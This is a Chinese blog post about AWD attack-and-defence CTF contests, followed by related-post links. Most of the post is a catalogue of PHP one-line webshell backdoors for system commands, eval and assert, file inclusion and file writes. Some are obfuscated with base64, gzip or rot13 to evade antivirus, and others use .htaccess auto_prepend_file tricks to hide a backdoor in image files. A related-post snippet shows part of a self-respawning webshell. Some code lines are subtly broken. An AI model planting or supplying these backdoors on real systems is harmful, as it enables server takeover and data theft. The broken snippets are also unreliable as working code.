AWD攻防赛

已于 2023-11-12 20:55:37 修改
阅读量463 收藏 11
点赞数
文章标签: 网络
于 2022-12-08 10:37:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41672971/article/details/128230625
版权

后门利用

简单一句话后门分类

php后门木马常用的函数大致上可分为四种类型:

1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open

2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

3. 文件包含生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

4. .htaccess: SetHandler, auto_prepend_file, auto_append_file

1. 执行系统命令:

system 函数      执行命令

test.php?cmd=ls

system($_GET[cmd]);

passthru 函数

test.php?cmd=ls

passthru($_GET[cmd]);   执行命令

shell_exec 函数

test.php?cmd=ls

echo shell_exec($_GET[cmd]);     执行命令

exec 函数

test.php?cmd=ls

$arr = array();

exec($_GET[cmd],$arr);       执行命令

print_r($arr);

popen 函数

test.php?cmd=ls

$handle = popen('$_GET[cmd], 'r');

$read = fread($handle, 2096);

echo $read;

pclose($handle);

proc_open 函数

test.php?cmd=ls

$descriptorspec = array(

0 => array('pipe', 'r'),

1 => array('pipe', 'w'),

2 => array('pipe', 'w'),

);

$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);

fclose($pipes[0]);

$output = array();

while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));

print_r($output);
2. 代码执行与加密:

eval 函数

//最常见的一句话木马

eval($_POST['cmd']);

base64_decode 函数

//为了免杀及隐藏而加密代码

//密文: eval($_POST['cmd']);

eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));

gzinflate 函数

//为了免杀及隐藏而加密代码

//密文: eval($_POST['cmd']);

eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));

gzuncompress 函数

//为了免杀及隐藏而加密代码

//密文: eval($_POST['cmd']);

eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));

gzdecode 函数

//为了免杀及隐藏而加密代码

//密文: eval($_POST['cmd']);

eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));

str_rot13 函数

//为了免杀及隐藏而加密代码

//密文: eval($_POST['cmd']);

eval(str_rot13('riny($_CBFG[pzq]);'));

assert 函数

//类似eval函数

assert($_POST['cmd']);

call_user_func 函数

//使用call_user_func调用assert

call_user_func('assert',$_POST['cmd']);

call_user_func 函数

//使用call_user_func调用任意函数

//test.php?a=assert&cmd=phpinfo()

call_user_func($_GET[a],$_REQUEST['cmd']);

组合代码

//组合方式调用任意函数

//test.php?a=assert&cmd=phpinfo()

$_GET[a]($_REQUEST['cmd']);
3. 文件包含与生成:

require 函数

//包含任意文件

//test.php?file=123.jpg

require($_GET[file]);

require_once 函数

//包含任意文件

//test.php?file=123.jpg

require_once($_GET[file]);

include 函数

//包含任意文件 www.chnhack.com

//test.php?file=123.jpg

include($_GET[file]);

include_once 函数

//包含任意文件

//test.php?file=123.jpg

include_once($_GET[file]);

file_get_contents 函数

//读取任意文件

//test.php?f=config.inc.php

echo file_get_contents($_GET['f']);

file_put_contents 函数

//生成任意内容文件

//a=test.php&b=

file_put_contents($_GET[a],$_GET[b]);

fputs 函数

//生成任意内容文件

//a=test.php&b=

fputs(fopen($_GET[a],"w"),$_GET[b]);
4. .htaccess:

SetHandler

//可将php代码存于非php后缀文件,例: x.jpg

//将以下代码写入.htaccess中

//连接x.jpg即可启动后门木马出处www.admin8.us

SetHandler application/x-httpd-php

auto_prepend_file

//可将php代码存于非php后缀文件,例: 123.gif

//将以下代码写入.htaccess中, 文件路径必须是绝对路径

//访问网站上任何php文件都会启动该php后门木马

//可在不更改站点源代码的情况下记录所有$_REQUEST的值,也可批量挂马

php_value auto_prepend_file c:/apache2/htdocs/123.gif

auto_append_file

//类似auto_prepend_file

//可将php代码存于非php后缀文件,例: 123.gif

//将以下代码写入.htaccess中, 文件路径必须是绝对路径

//访问网站上任何php文件都会启动该php后门木马

php_value auto_append_file c:/apache2/htdocs/123.gif

PHP后门的eval类和system类 函数到底有哪些区别

一、

  一直以来对PHP的eval这一类函数和system这一类存在疑惑的地方,今天彻底研究了一下,写查PHP一句话的时候可以更有把握一些。其实都是一些满基础的知识,大佬别喷。干安全的基础很重要。

二、PHP的eval类型函数,一句话:代码执行而不是命令执行。(菜刀用这类)

1、简单类

//#1-eval
 <?php
     eval($_POST["cmd"])
 ?>
 //post:cmd=phpinfo();
 
 
 //#2-assert
 <?php
     assert($_POST["cmd"])
 ?>
 //post:cmd=phpinfo();
 
 
 //#3-call_user_func
 <?php
     call_user_func($_POST["fun"],$_POST["para"])
 ?>
 //post:fun=assert&para=phpinfo();

2、复杂类

//#1-create_function
 <?php 
     $a= $_POST['func'];
     $b = create_function('$a',"echo $a");
     $b('');
 ?>
 //post:func=phpinfo();
 
 
 //#2-array_map------->这个不懂先记下来
 <?php
     $array = array(0,1,2,3,4,5);
     array_map($_GET['func'],$array);
 ?>
 //post:func=phpinfo

三、PHP的system类型函数,一句话:命令执行而不是代码执行。

//#1-system
 <?php system($_POST["cmd"]);?>
 
 //#2-passthru
 <?php passthru($_POST["cmd"]);?>
 
 //#3-exec
 <?php echo exec($_POST["cmd"]);?>
 
 //#4-pcntl_exec
 <?php 
     pcntl_exec("/bin/bash",array($_POST["cmd"]));
 ?>
 
 //#5-shell_exec
 <?php echo shell_exec($_POST["cmd"]); ?>
 
 //#6-popen()/proc_popen()
 <?php $handle = popen("/bin/ls","r");?>
 
 //#7-``
 <?php echo `whoami`?>

高深一点的:

 <?php
 $cmd = 'system';
 ob_start($cmd)
 echo "$_GET[a]";
 ob_end-flush();
 ?>//?a=whoami

拿到源代码首先可以用D盾扫一下后门,然后导出

 正常审计也可以

EVAL REQUEST后门 

先看config.php

很明显一句话

 其他一句话均可以这样利用

EXEC后门

 成功

SYSTEM 后门

 

 貌似不能用

INCLUDE

成功 

任意文件读取

不过读取路径并不会利用。。。。。

bboywxy8340
关注
AWD攻防 webshell
04-01
webshell,通过网页获取主机资源
不死马php如何取证_AWD不死马与克制方法
weixin_39796878的博客
12-21 408
一个简单的不死马如:ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '.3.php';$code = '';//pass=passwhile (1){file_put_contents($file,$code);system('touch -m -d "2018-12-01 09:10:12" .3.php');...
CTF-AWD入门手册
二狗的博客
01-03 1146
今天给大家带来了AWD的入门知识点,AWD制也是CTF中常见的制,本文讲的AWD中常见的知识点,可能会有许多的遗漏,望大家指出交流,如果对本文感兴趣不妨一键三连。
浅谈AWD攻防的生存攻略
鹿鸣天涯
09-28 5115
AWD:Attack With Defence,即攻防对抗,比中每个队伍维护多台服务器(一般两三台,视小组参人数而定),服务器中存在多个漏洞(web层、系统层、中间件层等),利用漏洞攻击其他队伍可以进行得分,加固时间段可自行发现漏洞对服务器进行加固,避免被其他队伍攻击失分。
AWD模式下的各类PHP木马
BlusKing
04-19 5246
经典一句话木马 最最常见的PHP木马,经典,但也满足不了我们的需求,很容易被大佬识破 <?php @eval($_POST["cmd"]); ?> <?php@assert($_POST['cmd']);?> 混淆马:让木马内容难以识别 <?php assert($_POST[-7]); ?> 变换成 <?php ...
线上awd攻防waf
qq_56313338的博客
06-10 947
线上awd攻防 waf
AWD指南
学生
11-04 3120
经过整理,需要的一些工具和脚本,AWD思路(方便到时候直接复制粘贴,提高效率)
AWD前准备工作以及深度脚本讲解
热门推荐
薯片薯条的博客
11-10 1万+
有幸被邀请代表学校去参加线下攻防,也就是俗称的AWD。 当然,在这一方面我也只能算是小白,所以希望各位大佬在看完我写的博客以后能指正一些错误。 一.比介绍 AWD制是按照分组来进行比的。每组3-4人,经过不同的分工,从而实现对服务器的维护以及对其他人的服务器进行攻击。 每个服务器都会有一个提前放好的有漏洞的网站,需要进行代码审计,然后修补漏洞。 举个例子,某些参数一可以参杂系统的cmd命令上来,如果执行成功,就会获取你服务器上某个文件夹下的flag.txt的内容,一旦获取成功,就代表被攻破。 .
awd网络攻防平台.zip
09-30
项目代码
AWD攻防 PHP WAF
10-16
本话题主要围绕"AWD攻防 PHP WAF"展开,探讨其核心概念、工作原理以及如何在实际比中发挥作用。 PHP WAF是一种基于PHP的Web应用防火墙,它的主要任务是对HTTP请求进行过滤和检查,防止恶意代码注入、SQL注入...
awd网络攻防常用的不死马,超强
10-30
以上是不死马的代码,pass=R_Hacker. 采用了md5加密。
网络攻防平台源码(AWD-platform源码).7z
06-19
一个awd攻防的裁判平台。 版本:beta v2.0 开发语言:python3 + django 平台分为两个部分 裁判机 靶机 通过特定接口,来实现靶机flag与服务器的通信 搭建流程 裁判机 安装所需环境 裁判机:python3+django 全局搜索woshiguanliyuan,并修改为随机字符串,此处为管理平台地址 /untitled/urls.py path('woshiguanliyuan/',views.admin,name='admin'), path('woshiguanliyuan/table/',views.admin_table,name='admin_table'), /app/views.py if 'woshiguanliyuan' not in request.META['HTTP_REFERER']: 第31和47换为你的目录 列:("/var/www/awd_platform/app/qwe.txt","a") 修改app/management/commands/init.py,添加用户 #['用户名','用户靶机token','用户靶机token'] user=[ ['123456','FF9C92C7SDFABB71566F73422C','FF9C92C7SDFABB71566F73422C'], ['aaabbb','311F8A54SV9K6B5FF4EAB20536','311F8A54SV9K6B5FF4EAB20536'] ] 修改/app/views.py第行d89f33b18ba2a74cd38499e587cb9dcd为靶机中设置的admin_token值的md5 if('d89f33b18ba2a74cd38499e587cb9dcd'==hl.hexdigest()): 运行 python3 manage.py init python3 manage.py manage.py runserver --insecure 靶机 安装所需环境 靶机:python+requests 修改send_flag.py参数,并将其放入靶机,设权限700。 靶机 sudo python send_flag.py。 靶机生成flag脚本,send_flag.py import requests import time import random import string import hashlib token='woshiwuxudong' # 红队 baji='311F8A54SV9K6B5FF4EAB20536' def getFlag(): #return ''.join(random.sample(string.ascii_letters + string.digits, 48)) m = hashlib.md5(''.join(random.sample(string.ascii_letters + string.digits, 48)).encode(encoding="utf-8")).hexdigest() return m while(1): f=open('/flag','w') flag=getFlag() f.write(flag) data={ 'flag':flag, 'token':token, 'baji':baji, } r=requests.post('http://127.0.0.1/caipanflag/',data=data) print(r.text) f.close() time.sleep(300) 重要须知 更新作者基础上: 1.增加flag验证一次性失效性,使得每个用户都并且仅可以提交一次flag 2.增加排名情况 3.flag改为MD5 4.增加丢失flag一轮扣100分
AWD攻防脚本集合.zip
07-18
"AWD攻防脚本集合.zip"是一个包含与网络安全竞相关的脚本资源的压缩文件。这类比通常称为AWD(Attack-Defend)或CTF(Capture The Flag)比,是网络安全领域的实战演练,旨在提升参者的攻防技能。在这样的...
wp篇 AWD某一题全流程复现【江西省高校网络安全技能大
这周末在做梦的博客
11-06 5409
一,题概述 1概述 这道题目是PbootCMS V3.05,主页面如下。 2配置概述 采用tutum/lamp的镜像,Php 5.3+,其他扩展自行apt安装即可 3漏洞题 目前在dump下来的镜像中,发现存在且非CMS本身的官方预制漏洞有三,分别记录如下。 备注:在复现以下漏洞的时候,为了图一省事就赋予了所有文件777权限。 二,RCE 1题预制原理 (1)文件预制 .htaccess中 AddType application/x-httpd-php .sql php_value auto_ap
寒假AWD训练之初学代码审计
qq_42728977的博客
01-17 1254
寒假在家,老师组织了AWD训练,还是实战出真知,感觉比的学习效率是真的高。做个小总结。 也是刚入门,欢迎大佬斧正。 漏洞1:webshell.php 第一个漏洞是后门的,是一句话木马。 <?php @eval($_POST['moxiaoxi']) ?> 很简单,没有什么难度,可以直接菜刀,但是菜刀不能批量自动化获取flag。所以,尝试着写脚本。 import requests ...
AWD常见防御加固手段
最新发布
Welcome To Myon'Blog !
10-06 2119
一、加固用户名密码(用户层) 1、修改linux用户密码 2、删除其他可登录用户 二、加固SQL数据库(服务层) 1、修改mysql密码 2、删除匿名用户 3、刷新配置 4、改网站后台密码 三、后门文件查杀 四、关闭shell连接进程 五、处理新增文件与不死马 1、查看新增文件,删掉 2、删除不死马(rm -f 无法删除) (1)创建一个脚本 (2)加权777(最高权限) (3)在后台不断运行该脚本 六、弱口令与内核溢出提权
php中get,post传值的对照
weixin_43553654的博客
01-26 783
在目前我经历的一些ctf,awd中,用的最多的两种传参方式就是get,post这两种 1. GET是从服务器上获取数据,POST是向服务器传送数据。2. GET是把参数数据队列加到提交表单的ACTION属性所指的URL中,值和表单内各个字段一一对应,在URL中可以看到。POST是通过HTTP POST机制,将表单内各个字段与其内容放置在HTML HEADER内一起传送到ACTION属性所指的U...
Linux Polkit权限提升漏洞复现(CVE-2021-4034)
weixin_45945976的博客
01-26 7544
Linux Polkit权限提升漏洞 CVE-2021-4034 漏洞描述 Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。 漏洞影响 Polkit > 2009 漏洞复现 from ctypes import * from ctypes.util import find_library impo
AWD攻防系统框架有那些
03-25
常见的AWD攻防系统框架包括以下几种: 1. FBCTF:一个基于CTF比AWD攻防系统,在网络分布式安全测试中广泛使用。 2. iCTF:一个开源的CTF比管理平台和AWD攻防系统,支持多个团队同时进行攻击和防御。 3. PwnCloud:一个基于云计算的AWD攻防系统,支持团队合作和实时攻击和防御。 4. Th3inspector:一个基于Web的AWD攻防系统,使用Firefox浏览器负责管理客户端,支持多种攻击方式和协议。 5. T-vision:一个面向企业级的AWD攻防系统,采用可视化界面管理多个主机的网络安全,支持多个团队并发作战。 6. Defender:一个专业的安全防御解决方案,提供全面的网络安全监控和攻击事件响应能力,适用于企业内部安全管理和外部渗透测试。 这些AWD攻防系统框架主要用于帮助人们模拟实际网络环境中的攻击和防御,提升网络安全意识和技术水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值